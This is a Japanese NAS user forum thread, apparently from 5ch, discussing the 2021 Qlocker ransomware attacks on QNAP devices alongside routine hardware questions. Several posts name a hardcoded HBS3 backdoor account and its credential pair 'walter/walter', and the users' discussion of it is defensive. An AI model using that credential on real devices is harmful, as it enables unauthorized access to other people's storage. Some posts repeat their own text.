2021/05/03(月) 14:10:10.28ID:o2CvfV9vM541不明なデバイスさん (ワッチョイ 075f-hbKz)
2021/05/03(月) 14:19:30.62ID:evtKBwoG0 >>525
buffalo WSR-5400AX6 ファーム Ver 1.01
@nifty光 v6プラス NDプロシキ
QNAP TS-453Be QTS 4.5.2 build 20210302 → 4.5.3.1652 20210428
元々ルーターの調子が微妙で時々再起動する必要があったんだが
昨夜QTSの更新してからWANの接続がおかしい&ルーター再起動してもしばらくすると不安定になる
>525見てまさかそんなと思いつつTS-453Beの電源切ってルーター再起動かけたら復旧したっぽい
午前中ずっと問題なくて昼イチでNASの電源入れたらまたおかしくなった
うーん まさかそんな
今後の対策はさておき当座復旧するには手動でQTSダウングレードしないとあかんのかな
ちなみに調子のいいNECルーターの機種名教えてもらっていいでしょうか?
buffalo WSR-5400AX6 ファーム Ver 1.01
@nifty光 v6プラス NDプロシキ
QNAP TS-453Be QTS 4.5.2 build 20210302 → 4.5.3.1652 20210428
元々ルーターの調子が微妙で時々再起動する必要があったんだが
昨夜QTSの更新してからWANの接続がおかしい&ルーター再起動してもしばらくすると不安定になる
>525見てまさかそんなと思いつつTS-453Beの電源切ってルーター再起動かけたら復旧したっぽい
午前中ずっと問題なくて昼イチでNASの電源入れたらまたおかしくなった
うーん まさかそんな
今後の対策はさておき当座復旧するには手動でQTSダウングレードしないとあかんのかな
ちなみに調子のいいNECルーターの機種名教えてもらっていいでしょうか?
543不明なデバイスさん (ブーイモ MMcb-TQtH)
2021/05/03(月) 14:35:49.06ID:o2CvfV9vM DHCP関係が競合してるんじゃないかな。
544不明なデバイスさん (ワッチョイ df7c-eh0L)
2021/05/03(月) 14:44:48.46ID:zTOUIbwp0 LAN内でNASが起動しているとルータがおかしくなるという話は前からあって、
何年か前はNECのルータをBufffaloに換えてみろってのが対処案のひとつだったけど
最近は逆なのか。
何年か前はNECのルータをBufffaloに換えてみろってのが対処案のひとつだったけど
最近は逆なのか。
545不明なデバイスさん (ワッチョイ bfcb-nhai)
2021/05/03(月) 15:12:55.55ID:Lnz0moHs0 >>512
IPv6 は有効にしてる?
IPv6 は有効にしてる?
546不明なデバイスさん (ブーイモ MMcf-AH5W)
2021/05/03(月) 15:13:07.10ID:5m494XnSM547不明なデバイスさん (ワッチョイ 2788-BDeo)
2021/05/03(月) 15:51:36.95ID:BpRcP0360 qufirewallのイベントのキャプチャーした結果ってどこで見れるんでしょうか?
548不明なデバイスさん (ワッチョイ 2788-BDeo)
2021/05/03(月) 16:00:28.57ID:BpRcP0360 すいません ファイル保存できるんですね 解決しました
549不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/03(月) 16:31:20.38ID:ZrOVdosA0 複数台のQNAP機でsmbマルチチャネル組んでるんだけど、smb使ってNAStoNASでbackupしてくれる方法って無いの?
550不明なデバイスさん (ササクッテロラ Sp5b-fIOc)
2021/05/03(月) 16:42:31.71ID:vjKXvbRqp 今469Proを使っていて、ファームは4.2.2です。不用意にあげるとバグに巻き込まれるとかこのスレで見ていたので、ずっとそのままにしてました。今回のランサムウェア問題では被害は受けていないようなのですが、最新のMalwareRemoverは動かないみたいですし、この際最新ビルドに上げた方がいいのかと思ったのですが、安定しているならやめておいた方がいいでしょうか?
551不明なデバイスさん (スプッッ Sd7f-jYst)
2021/05/03(月) 16:55:00.23ID:fVBc8h/wd552不明なデバイスさん (アウアウウー Saab-o9L3)
2021/05/03(月) 17:53:23.42ID:d5JFmHJZa >>550
469Lで4.3.4(最新)だけどなぜかMalwareRemoverがインストールできないという事象が発生して困ってる
おま環なのかもしれないけど、他にもそういう人がいるならMalwareRemoverのためにアップデートするのは得策ではないかも
ちなみにファームウェア自体は特に目立った不具合もなく安定してる
469Lで4.3.4(最新)だけどなぜかMalwareRemoverがインストールできないという事象が発生して困ってる
おま環なのかもしれないけど、他にもそういう人がいるならMalwareRemoverのためにアップデートするのは得策ではないかも
ちなみにファームウェア自体は特に目立った不具合もなく安定してる
553不明なデバイスさん (ササクッテロラ Sp5b-fIOc)
2021/05/03(月) 18:01:39.64ID:vjKXvbRqp >552
ありがとうございます。今まさにOKボタンを押す直前でしたw アプリは感染してたか知りたいために入れるつもりでしたので、他に確認方法があれば無理して入れるつもりはなかったのですが、ここまで来たのでファーム更新してみます。とりあえず外に出る設定になっていなければランサムウェアにやられなさそうだったので。
ありがとうございます。今まさにOKボタンを押す直前でしたw アプリは感染してたか知りたいために入れるつもりでしたので、他に確認方法があれば無理して入れるつもりはなかったのですが、ここまで来たのでファーム更新してみます。とりあえず外に出る設定になっていなければランサムウェアにやられなさそうだったので。
554不明なデバイスさん (テテンテンテン MM8f-FMSc)
2021/05/03(月) 18:37:23.08ID:dGSi3qyoM 2.5GbEに惹かれてTS-253Dを購入しようとしたらこのスレ見て買うのを躊躇ってる。QNAPはセキュリティやばそうだから、2.5G諦めてシノにするか。
556不明なデバイスさん (ワッチョイ df7c-Irxz)
2021/05/03(月) 19:26:19.61ID:9tYAth9+0 >>555
みんなすごい訳ではないがQlockerにどういうルートでやられたかもはっきりしないしIPv6との関係もよく分かってない。
なのでQNAPユーザーではなくQNAP作ったやつがアホな可能性もある。
みんなすごい訳ではないがQlockerにどういうルートでやられたかもはっきりしないしIPv6との関係もよく分かってない。
なのでQNAPユーザーではなくQNAP作ったやつがアホな可能性もある。
557不明なデバイスさん (ブーイモ MMcf-hiJl)
2021/05/03(月) 19:34:49.54ID:CwmQATZ/M >>533
520です。死にかけてるのはポートスキャンや執拗なログインの繰り返しでリソース不足に陥った可能性もあるけど、ビジネスでQNAPを使ってるんであれば、HBSとマルチメディア系サービス、QNAPCloud、IPv6の停止を含めて最低限のサービスに縮退(徹底的にサービス停止)して運用継続するしか無いだろうね。また、業務要件が許せば、QuFirewallを使い、ローカルからのwebアクセスを除き徹底的に内向きのパケットは止めて、QNAPからの安全宣言を待つしか無いのかも。事後対応など企業としてのスタンスは良く見ておく必要がありますね。
520です。死にかけてるのはポートスキャンや執拗なログインの繰り返しでリソース不足に陥った可能性もあるけど、ビジネスでQNAPを使ってるんであれば、HBSとマルチメディア系サービス、QNAPCloud、IPv6の停止を含めて最低限のサービスに縮退(徹底的にサービス停止)して運用継続するしか無いだろうね。また、業務要件が許せば、QuFirewallを使い、ローカルからのwebアクセスを除き徹底的に内向きのパケットは止めて、QNAPからの安全宣言を待つしか無いのかも。事後対応など企業としてのスタンスは良く見ておく必要がありますね。
558不明なデバイスさん (ワッチョイ 7fbb-OedE)
2021/05/03(月) 19:48:19.49ID:OXMHHTQU0 >>550
同じく469Pro(Raid6)でファームは半年〜1年に一回位、アプリは1〜3か月くらいで確認/更新してた
今は最新で 4.3.4 1652(2021/04/13)、Mal 3.6.0.2、HBS3 3.0.210411で問題なく稼働中
毎日自動起動の231P(すべて最新)にHBS3でバックアップ、mycloud使わず外には開いてないので
今回の被害はなし
更新するか否かは自己判断だと思うけど参考になるかな?
同じく469Pro(Raid6)でファームは半年〜1年に一回位、アプリは1〜3か月くらいで確認/更新してた
今は最新で 4.3.4 1652(2021/04/13)、Mal 3.6.0.2、HBS3 3.0.210411で問題なく稼働中
毎日自動起動の231P(すべて最新)にHBS3でバックアップ、mycloud使わず外には開いてないので
今回の被害はなし
更新するか否かは自己判断だと思うけど参考になるかな?
560不明なデバイスさん (JP 0Hbf-zL94)
2021/05/03(月) 20:15:52.05ID:5u8dDTRZH HBS3にハードコードされた「walter」というバックドアアカウントでNASに侵入
NASに到達するまでの侵入経路は、皆同じなのか、それぞれなのか未だ不明
現状、Malware Removerやアプリの更新で対症療法するしかない
これであってる?
NASに到達するまでの侵入経路は、皆同じなのか、それぞれなのか未だ不明
現状、Malware Removerやアプリの更新で対症療法するしかない
これであってる?
561不明なデバイスさん (ワッチョイ a75f-MJGp)
2021/05/03(月) 20:22:08.22ID:vqjlcSkZ0 侵入手口や経路はもう分かってるだろうに、対策のために具体的な発表するどころか、お前らのセキュリティ対策がなってねえんだよ的なコラム送ってよこしやがったからなw
562不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/03(月) 20:23:06.56ID:kl78OZMK0 あってる、CVE-2021-28799が公開されるまでは安心できない
563不明なデバイスさん (ワッチョイ bf02-OC3W)
2021/05/03(月) 20:27:31.60ID:lyEr1P1V0 外付けドライブのバックアップにはうちのは影響及んでいなかったけどバックアップそのものも7z化された人もいるのかな
564不明なデバイスさん (ササクッテロラ Sp5b-fIOc)
2021/05/03(月) 20:37:02.19ID:vjKXvbRqp >558
ありがとうございます。すでに更新してしまいましたが、QSnatchにやられてました。。外に出していないつもりでしたが、数年前に出しちゃってたみたいでした。目に見える被害はなさそうでしたが、セキュリティ関係の設定を変更して今ひと段落してます。返答してくださった方々、ありがとうございました。
ありがとうございます。すでに更新してしまいましたが、QSnatchにやられてました。。外に出していないつもりでしたが、数年前に出しちゃってたみたいでした。目に見える被害はなさそうでしたが、セキュリティ関係の設定を変更して今ひと段落してます。返答してくださった方々、ありがとうございました。
565不明なデバイスさん (ワッチョイ bf68-sY7A)
2021/05/03(月) 20:38:04.23ID:94F7ePiY0 ハードコードが原因て確定したら補償とかあるんかな?
多分使用許諾で回避はしとるやろうけど世間は納得せんやろ
多分使用許諾で回避はしとるやろうけど世間は納得せんやろ
567不明なデバイスさん (ワッチョイ ff02-JFo9)
2021/05/03(月) 21:25:51.85ID:hdjkkTom0569不明なデバイスさん (ワッチョイ 8705-8Xk1)
2021/05/03(月) 23:16:38.41ID:+j01YHVy0 直近の22時から23時までの間に377パケットのアクセスが拒否されたとQuFirewallに出てるけど、皆さんどれくらい?
570不明なデバイスさん (ワッチョイ 7fbb-WLNx)
2021/05/03(月) 23:21:29.08ID:/Iapw4r60 >>568
バックアップを常に繋いでおいたら、落雷の時とか終わる
バックアップを常に繋いでおいたら、落雷の時とか終わる
571不明なデバイスさん (ワッチョイ df7f-QuVS)
2021/05/03(月) 23:26:15.07ID:1HpY+ats0 >>569
自分のところは、21:58-22:58でIPv4が73、IPv6が0。毎時間、だいたい70〜80ぐらいで推移してる感じ。
自分のところは、21:58-22:58でIPv4が73、IPv6が0。毎時間、だいたい70〜80ぐらいで推移してる感じ。
572不明なデバイスさん (テテンテンテン MM8f-GFBR)
2021/05/03(月) 23:27:05.73ID:JrL6vvucM574不明なデバイスさん (ワッチョイ 8705-8Xk1)
2021/05/03(月) 23:35:20.04ID:+j01YHVy0 皆さん少ない?みたいで、ウチだけ異常に多いのは気のせいかな。取り敢えずファイヤーウォールの設定みなおしてみることにします。
575不明なデバイスさん (ワッチョイ df7c-Irxz)
2021/05/03(月) 23:50:02.81ID:9tYAth9+0 ところで8080の代替って1024以降で特に使ってない番号なら何番でもいいんでしょうか?
本当大変です!
本当大変です!
576不明なデバイスさん (ワッチョイ bf81-OedE)
2021/05/04(火) 00:09:13.27ID:MDLVbQRQ0577不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/04(火) 00:11:50.54ID:o58N3WhI0578不明なデバイスさん (ワッチョイ a75f-MJGp)
2021/05/04(火) 00:26:02.11ID:KATa1e9u0579不明なデバイスさん (ワッチョイ 7f8e-MiMN)
2021/05/04(火) 01:29:19.70ID:r00Q4Y4h0 馬鹿は内容ではなく数を気にする。理由を知らずに。
580不明なデバイスさん (ワッチョイ 7fbb-RMIX)
2021/05/04(火) 01:34:22.57ID:4QFL95nA0 今回のインシデントで、NASを本来のNASとして以上に使うのは不安になってくるな。
ASUSやSynologyもネットワーク機器をリリースしてて、多機能っぷりやコスパで好評だと思うけど、大丈夫なんだろうかと思ってしまう。
ASUSやSynologyもネットワーク機器をリリースしてて、多機能っぷりやコスパで好評だと思うけど、大丈夫なんだろうかと思ってしまう。
581不明なデバイスさん (ワッチョイ 7f8e-MiMN)
2021/05/04(火) 01:35:12.05ID:r00Q4Y4h0 >>580
馬鹿なお前が不安になっているだけ
馬鹿なお前が不安になっているだけ
582不明なデバイスさん (ワッチョイ 7fbb-RMIX)
2021/05/04(火) 01:39:23.55ID:4QFL95nA0583不明なデバイスさん (ワントンキン MMbf-hbKz)
2021/05/04(火) 01:40:10.91ID:R0t+c5ljM 嬉々として馬鹿連呼する 8e- 君
相変わらずの語彙ですね
相変わらずの語彙ですね
584不明なデバイスさん (ワッチョイ 67f5-Pk3V)
2021/05/04(火) 01:53:40.90ID:PqszUGU60 うちはqnapとsynologyのnasつかってるが、外から入ってくる用途はGWFW(Fortigate)に切り出しておいたお陰で助かった。
それでも内側からセッション開始するようなモノはどうにもならんけど、セキュリティは別にしたほうがいいと思う。
それでも内側からセッション開始するようなモノはどうにもならんけど、セキュリティは別にしたほうがいいと思う。
585不明なデバイスさん (ワントンキン MMbf-Pk3V)
2021/05/04(火) 02:08:20.11ID:dNWpq3hNM 牛ユーザーみたいな馬鹿ばっかになってる。何でかね?
586不明なデバイスさん (スプッッ Sd7f-rgaM)
2021/05/04(火) 02:14:05.99ID:3VCXe/DQd 中途半端な知識、それも低レベルの頭の弱い人に広まっちゃってことだろう
587不明なデバイスさん (ワッチョイ 5f68-3+Ge)
2021/05/04(火) 02:19:46.07ID:5QG3uGM60 まあ作ってるとこも大概だからな
588不明なデバイスさん (ワントンキン MMbf-Pk3V)
2021/05/04(火) 02:25:30.46ID:UwjrffFqM つまり
589不明なデバイスさん (ワントンキン MMbf-Pk3V)
2021/05/04(火) 02:27:29.95ID:UwjrffFqM 10^馬鹿度数でリスクが上がる
590不明なデバイスさん (ワッチョイ 7f10-tqq1)
2021/05/04(火) 02:28:14.75ID:Hfe2mz4P0 煽りは放置で
591不明なデバイスさん (スプッッ Sd7f-rgaM)
2021/05/04(火) 02:43:29.24ID:3VCXe/DQd このスレ見ても頭の弱い人だけ被害にあっている感じがする
よくわからないまま何も考えずに公開している
ドアの鍵を掛けないどころか、ドア開いておいて泥棒に入られて大騒ぎ
よくわからないまま何も考えずに公開している
ドアの鍵を掛けないどころか、ドア開いておいて泥棒に入られて大騒ぎ
592不明なデバイスさん (ブーイモ MMcf-hiJl)
2021/05/04(火) 06:52:07.76ID:89TMpGIAM >>584
Fortigateは日本国内からのみ接続可にしてるって事?確かにQNAPのvpnを使っていてもwalter/walterで入られそう(証明書必要だから大丈夫なんだろうけど、今回の件で全く安全に思えない)
Fortigateは日本国内からのみ接続可にしてるって事?確かにQNAPのvpnを使っていてもwalter/walterで入られそう(証明書必要だから大丈夫なんだろうけど、今回の件で全く安全に思えない)
593不明なデバイスさん (ワッチョイ 67f5-/5i0)
2021/05/04(火) 08:33:03.60ID:PqszUGU60 >>592
>Fortigateは日本国内からのみ接続可にしてるって事?確かにQNAPのvpnを使っていてもwalter/walterで入られそう(証明書必要だから大丈夫なんだろうけど、今回の件で全く安全に思えない)
FGのSSL-VPNだと証明書使うんだけど、やっぱり脆弱性あったりするのであんまりお手軽じゃないけどIPSec/L2TP使ったり、第二要素(メールによる乱数送付だったり自分の場合は機器に付いてきたおまけのソフトウェアトークン使ってる。家用だからね。)を使ったり、日本国内に制限したり、LAN側で使えるプロトコルを制限したりしてる。
NASのデータも大事だけど、家の中で変なデーター分撒かれても嫌だしね。
>Fortigateは日本国内からのみ接続可にしてるって事?確かにQNAPのvpnを使っていてもwalter/walterで入られそう(証明書必要だから大丈夫なんだろうけど、今回の件で全く安全に思えない)
FGのSSL-VPNだと証明書使うんだけど、やっぱり脆弱性あったりするのであんまりお手軽じゃないけどIPSec/L2TP使ったり、第二要素(メールによる乱数送付だったり自分の場合は機器に付いてきたおまけのソフトウェアトークン使ってる。家用だからね。)を使ったり、日本国内に制限したり、LAN側で使えるプロトコルを制限したりしてる。
NASのデータも大事だけど、家の中で変なデーター分撒かれても嫌だしね。
594不明なデバイスさん (ワッチョイ df7c-Irxz)
2021/05/04(火) 08:43:21.39ID:0pLO2Y300 >>512
これを見てバカが感染とか知識のある奴が大丈夫とは言えないな。
うちも8拠点のうちやられてるのは全部ipv6
ただし中にはhome(何も入ってない領域)だけやられたのもある。
あと古いファームの古いQNAPは全く感染してない。
というかHBS3入ってないのは感染してない。
というかNTTの230NEとかv6切り方が分からん!
これを見てバカが感染とか知識のある奴が大丈夫とは言えないな。
うちも8拠点のうちやられてるのは全部ipv6
ただし中にはhome(何も入ってない領域)だけやられたのもある。
あと古いファームの古いQNAPは全く感染してない。
というかHBS3入ってないのは感染してない。
というかNTTの230NEとかv6切り方が分からん!
595不明なデバイスさん (ワッチョイ 67f5-/5i0)
2021/05/04(火) 08:47:36.95ID:PqszUGU60596不明なデバイスさん (ブーイモ MMcf-hiJl)
2021/05/04(火) 09:23:19.04ID:ZJUk1UCjM >>593
ありがとう。外からアクセス必須な場合は当面ルータかFirewallのVPNで守るしか無いね。
ありがとう。外からアクセス必須な場合は当面ルータかFirewallのVPNで守るしか無いね。
597不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/04(火) 09:25:38.88ID:+Tp4U0iz0 >>551
確かに。外のwindows機とかを使うしか無いのかもしらん
確かに。外のwindows機とかを使うしか無いのかもしらん
598不明なデバイスさん (ワッチョイ 075f-hbKz)
2021/05/04(火) 09:45:52.16ID:ej4wrotS0 メーカーがどんなポカやっててもユーザーサイドできちんと対策してれば避けられるって言うのは確かにそうかも知んないけど
そのきちんと対策の要求レベルがそこそこPCに詳しいであろう一般人の知識レベルを軽く超えてるのに対して
QNAP側の脆弱性がハードコートという限りなく人為的なポカだったのがな
まあ今ここで被害報告多いのは元々いたスレ住人の被害率が高いわけじゃなく
食らった人が情報探して集まって来てるからだろうけど
そのきちんと対策の要求レベルがそこそこPCに詳しいであろう一般人の知識レベルを軽く超えてるのに対して
QNAP側の脆弱性がハードコートという限りなく人為的なポカだったのがな
まあ今ここで被害報告多いのは元々いたスレ住人の被害率が高いわけじゃなく
食らった人が情報探して集まって来てるからだろうけど
599不明なデバイスさん (ワッチョイ df7c-Irxz)
2021/05/04(火) 09:49:14.39ID:0pLO2Y300600不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/04(火) 10:14:27.96ID:+Tp4U0iz0 ファーム更新して再起動したら外向けネットワーク見れないと警告出て、緊急時とは言えQNAP割り切りすぎだろと思ったら
DNSを127.0.0.1にされてただけだった
DNSを127.0.0.1にされてただけだった
601不明なデバイスさん (ワッチョイ 8705-8Xk1)
2021/05/04(火) 10:48:59.83ID:YzhaZKtB0 昨夜の569です。
QuFirewallのイベントキャプチャー試してみて中身を見てみたら、ポート6881へのアタックのオンパレードだったので(ドイツとか様々な国から)ルーター側で拒否設定してみた、
とりあえず様子見してみます。
QuFirewallのイベントキャプチャー試してみて中身を見てみたら、ポート6881へのアタックのオンパレードだったので(ドイツとか様々な国から)ルーター側で拒否設定してみた、
とりあえず様子見してみます。
602不明なデバイスさん (ワッチョイ 6736-TQtH)
2021/05/04(火) 11:17:13.89ID:o58N3WhI0 6881ってbittorrent…
604不明なデバイスさん (ワッチョイ df02-Ew5U)
2021/05/04(火) 11:56:41.58ID:wRhdiICL0 どうせDownload Stationインストールしているんだろ?
606不明なデバイスさん (ワッチョイ dff0-Irxz)
2021/05/04(火) 12:39:40.60ID:Pg+wcB770 なんかさnuroもnttもauも外から普通に8080でアクセスするとQNAPのログイン画面出るね。
なんでルーターの外側に堂々といるの?
なんでルーターの外側に堂々といるの?
607不明なデバイスさん (ワッチョイ 2788-BDeo)
2021/05/04(火) 12:52:37.62ID:w+lDthZo0 ダウンロードステーション(というかQNAP単体)でファイルをダウンロードしようとしたら、毎回QTS開いてダウンロードステーション開いて…ってしないといけないんだよね?
ダウンロードキューを自動でQNAPに送れるソフトでもあったらいいのになあ
ダウンロードキューを自動でQNAPに送れるソフトでもあったらいいのになあ
608不明なデバイスさん (スプッッ Sd7f-g9mB)
2021/05/04(火) 12:56:56.22ID:ojcakb+Bd 前はあったんだけどね
610不明なデバイスさん (ワッチョイ df87-7W5u)
2021/05/04(火) 15:12:11.57ID:2tSjD2ZV0 誰か作ってよ
611不明なデバイスさん (ブーイモ MMcb-eqqJ)
2021/05/04(火) 15:37:27.13ID:pbkdvmnSM 4/28付のファーム入れてみた
612不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/04(火) 15:49:15.52ID:o58N3WhI0 mysqldがcpuを2,30%程度使うようになってしまった、なんだこれ?
615不明なデバイスさん (ワッチョイ a75f-Mrwe)
2021/05/04(火) 16:37:03.37ID:7vYHovG00 ネットワークを10GbE化したんだけど、一台の端末から500MB/sぐらいで連続的に書き込みをしてると他の端末のSMB接続が強制的に切断される事があるんだよ
これって書き込みの処理に手間取って強制切断されてるのかな?
1GbEの時はそんなことならなかったのに
TS-1273U-RPで10TBx12本のRAID6で
クライアントはMacで5台接続
これって書き込みの処理に手間取って強制切断されてるのかな?
1GbEの時はそんなことならなかったのに
TS-1273U-RPで10TBx12本のRAID6で
クライアントはMacで5台接続
616不明なデバイスさん (ブーイモ MMcb-eqqJ)
2021/05/04(火) 17:26:05.43ID:tFT1aMZ4M Mac側でタイムアウト?
617不明なデバイスさん (ワッチョイ 87ba-sY7A)
2021/05/04(火) 17:29:04.45ID:IhfKF2gs0 qgetリモート、まだ120円で売ってるけどもう動かないのな
詐欺やんw
詐欺やんw
618不明なデバイスさん (ワッチョイ dff0-Irxz)
2021/05/04(火) 17:33:53.23ID:Pg+wcB770 ポートを8080、443の両方を同じポート番号にしたらアクセスできなくなったよ。
こういう時にどうすんの?
しかも今古いマックしかなくQFinderが起動しない。
こういう時にどうすんの?
しかも今古いマックしかなくQFinderが起動しない。
619不明なデバイスさん (ワッチョイ 2788-BDeo)
2021/05/04(火) 17:34:27.77ID:w+lDthZo0620不明なデバイスさん (ワッチョイ a75f-Mrwe)
2021/05/04(火) 17:40:16.98ID:7vYHovG00621不明なデバイスさん (ワッチョイ 5fbd-/otm)
2021/05/04(火) 18:26:43.20ID:4IS9aVkJ0 今自作PCをファイル鯖にしてBitlockerかけてファイルをバックアップしてるんですが、
これをNASにしたときの利点って何があるのでしょうか?
これをNASにしたときの利点って何があるのでしょうか?
622不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/04(火) 18:37:15.04ID:o58N3WhI0623不明なデバイスさん (アウアウウー Saab-Irxz)
2021/05/04(火) 19:08:31.15ID:Az4Vc2Hya624不明なデバイスさん (ワッチョイ dfb1-/1qA)
2021/05/04(火) 19:46:21.35ID:ic1t0mSX0 >>621
・省エネで電気代が少し安いかも
・一応電源関連が24h/365dという体
・専用筐体でコンパクト
ただし分解してみた感じ、少し高めのPC電源の方が品質は高そう。使ってるコンデンサ日本製とか高いやつはだいたいそうだしね。
ぶっちゃけPC鯖構築が屁でもない層にはダウングレードしかならないので、そのままでよいと思う。
面倒ごとはすべてNASになげられるという箇所において、そこにメリットがないならPC鯖で。
わいは鯖は鯖で、NASは完全に家族用と二次バックアップ先として使ってるよ。
・省エネで電気代が少し安いかも
・一応電源関連が24h/365dという体
・専用筐体でコンパクト
ただし分解してみた感じ、少し高めのPC電源の方が品質は高そう。使ってるコンデンサ日本製とか高いやつはだいたいそうだしね。
ぶっちゃけPC鯖構築が屁でもない層にはダウングレードしかならないので、そのままでよいと思う。
面倒ごとはすべてNASになげられるという箇所において、そこにメリットがないならPC鯖で。
わいは鯖は鯖で、NASは完全に家族用と二次バックアップ先として使ってるよ。
625不明なデバイスさん (ワッチョイ 87ba-sY7A)
2021/05/04(火) 20:03:24.76ID:IhfKF2gs0 >>624
自作でdtcp-ipムーブできれば既製nasなんか使わないんだけどって俺には利点
自作でdtcp-ipムーブできれば既製nasなんか使わないんだけどって俺には利点
626不明なデバイスさん (ワッチョイ dfb1-/1qA)
2021/05/04(火) 20:07:02.59ID:ic1t0mSX0 >>625
ああなるほど。自分はそれ使わないから思ってもみなかったけどたしかにそれもあるねー。
ああなるほど。自分はそれ使わないから思ってもみなかったけどたしかにそれもあるねー。
628不明なデバイスさん (ブーイモ MMcb-eqqJ)
2021/05/04(火) 21:08:12.67ID:s6mFdOyaM >>619
とりあえず最新ファームで、くらいしか思いつかない。。
とりあえず最新ファームで、くらいしか思いつかない。。
630不明なデバイスさん (ワッチョイ ff7c-lCU2)
2021/05/05(水) 00:11:55.25ID:1VmDohZb0 NASを個人用の小型linux鯖として使おうとしています。HDDが最低2台使えること、dockerで自作アプリが動くことが条件です。ノートPC・デスクPC・タブレット・スマホのデータを集約し、データ共有と管理を簡単にしたいのです。
現在の製品ラインアップを見ると453Dがデザイン・性能・値段の観点で優秀に見えるのですが、ARMの431K/P3でも困らない気がしています。自宅に2.5gbe環境はありませんが、体感速度が大きく変わるなら将来的に投資してみてもいいと思っています。
1) 453D
2) 413P3
3) 413K
4) それ以外
5) NAS以外の方法
おすすめはどれか、参考意見をお願いします。NASを買ったことはありません。
現在の製品ラインアップを見ると453Dがデザイン・性能・値段の観点で優秀に見えるのですが、ARMの431K/P3でも困らない気がしています。自宅に2.5gbe環境はありませんが、体感速度が大きく変わるなら将来的に投資してみてもいいと思っています。
1) 453D
2) 413P3
3) 413K
4) それ以外
5) NAS以外の方法
おすすめはどれか、参考意見をお願いします。NASを買ったことはありません。
631不明なデバイスさん (ワッチョイ 676f-H42+)
2021/05/05(水) 00:26:28.22ID:0krqfCQ70632不明なデバイスさん (ワッチョイ 8735-TiK/)
2021/05/05(水) 00:57:10.87ID:d5sJJLoJ0 TS-212P使ってるけど、ファンの音が最近特にうるさい。
リビングに置いてます。うるさいだけでなく熱でHDDも心配。
ずっとではないけど累計で1日の1/3くらいはブオーンと回ってます。
設定でなんとかならないか調べてみたけど、いい方法が無いみたい。
あまりにうるさいので買い替えを考えてるんだけど、
QNAP TS-231K
Symbology DS220j
のどちらがお勧めでしょうか?
静音性の観点からお願いします。
リビングに置いてます。うるさいだけでなく熱でHDDも心配。
ずっとではないけど累計で1日の1/3くらいはブオーンと回ってます。
設定でなんとかならないか調べてみたけど、いい方法が無いみたい。
あまりにうるさいので買い替えを考えてるんだけど、
QNAP TS-231K
Symbology DS220j
のどちらがお勧めでしょうか?
静音性の観点からお願いします。
633不明なデバイスさん (ワッチョイ 6736-TQtH)
2021/05/05(水) 01:26:04.47ID:vJb4qv970 部屋の温度をさげる工夫をしたほうがいいんじゃない?
635不明なデバイスさん (ワッチョイ 8768-sY7A)
2021/05/05(水) 07:55:05.74ID:Tr2VBYxr0 ts-469proなんだけど、hdd互換リスト見ても6tbまでしかない
8tbドライブ食うかな?
8tbドライブ食うかな?
636不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/05(水) 08:58:43.18ID:UEpeRVTW0 >>625
使ったこと無いけど PC TV Plus で出来るんでないの?
使ったこと無いけど PC TV Plus で出来るんでないの?
637不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/05(水) 09:06:25.39ID:UEpeRVTW0 >>630
用途によるけど431Kはメモリ増設出来ないのでdockerは厳しい。VMとかdocker使いたいならintel機でメモリ増設必須と思った方が良い
QNAPのdockerは十分実用にはなるけど、本当に凝ったことしようと思うと面倒になるので、お勧めは中古のQNAP買って使ってみて合わなければ売る事だな。それか自作
用途によるけど431Kはメモリ増設出来ないのでdockerは厳しい。VMとかdocker使いたいならintel機でメモリ増設必須と思った方が良い
QNAPのdockerは十分実用にはなるけど、本当に凝ったことしようと思うと面倒になるので、お勧めは中古のQNAP買って使ってみて合わなければ売る事だな。それか自作
638不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/05(水) 09:14:45.73ID:UEpeRVTW0 >>635
その世代は最大ボリュームが16TBなので、8TB HDDがサポートに入ってないんじゃ?
その世代は最大ボリュームが16TBなので、8TB HDDがサポートに入ってないんじゃ?
639不明なデバイスさん (ワッチョイ ff7c-lCU2)
2021/05/05(水) 10:19:10.79ID:1VmDohZb0 >>637
ありがとうございます。まずは中古でお試しするのはありですね。
ありがとうございます。まずは中古でお試しするのはありですね。
640不明なデバイスさん (ワッチョイ a75f-P7VV)
2021/05/05(水) 10:30:15.40ID:NfOQCXa20 PC TV Plusの方が汎用性高いよね
コレやシノは一方通行
コレやシノは一方通行
641不明なデバイスさん (ワッチョイ 5fbd-/otm)
2021/05/05(水) 12:29:44.66ID:9hID93EE0642不明なデバイスさん (ワッチョイ a7b0-sT2V)
2021/05/05(水) 12:41:40.54ID:xXjHKQT60 469proは8TB乗った記憶がある。
公式対応外容量の確認の意味を込めて東芝のMD05ACA800を載せたような。
ただしトレーのネジ穴がヘリウムや8TBドライブで出てきたネジ穴に対応してない。
きっちしシステムをセットアップして運用したわけじゃないから確実とは言えんが、
容量も普通に認識してたはず。
公式対応外容量の確認の意味を込めて東芝のMD05ACA800を載せたような。
ただしトレーのネジ穴がヘリウムや8TBドライブで出てきたネジ穴に対応してない。
きっちしシステムをセットアップして運用したわけじゃないから確実とは言えんが、
容量も普通に認識してたはず。
643不明なデバイスさん (アウアウウー Saab-xtdD)
2021/05/05(水) 13:07:25.89ID:4/PNFlyqa 469にヘリウム8TB×4でRAID10運用してるけど全容量認識してる
ネジ穴は4本中2本だけ合うので固定できないこともないけど、若干共振には弱くなってそう
ネジ穴は4本中2本だけ合うので固定できないこともないけど、若干共振には弱くなってそう
644不明なデバイスさん (ワッチョイ 87be-j6Hx)
2021/05/05(水) 13:13:48.76ID:b39JpniI0645不明なデバイスさん (ワッチョイ 8768-sY7A)
2021/05/05(水) 16:28:10.94ID:Tr2VBYxr0646不明なデバイスさん (ワッチョイ 5f68-sY7A)
2021/05/05(水) 17:17:17.63ID:GwWCxC9V0 おっと32bit w
647不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/05(水) 22:22:12.91ID:UEpeRVTW0648不明なデバイスさん (ブーイモ MMcb-eqqJ)
2021/05/05(水) 22:48:58.43ID:kiUyZg4jM649不明なデバイスさん (ブーイモ MMcb-eqqJ)
2021/05/05(水) 22:58:51.10ID:Y2sEfFDVM これかな
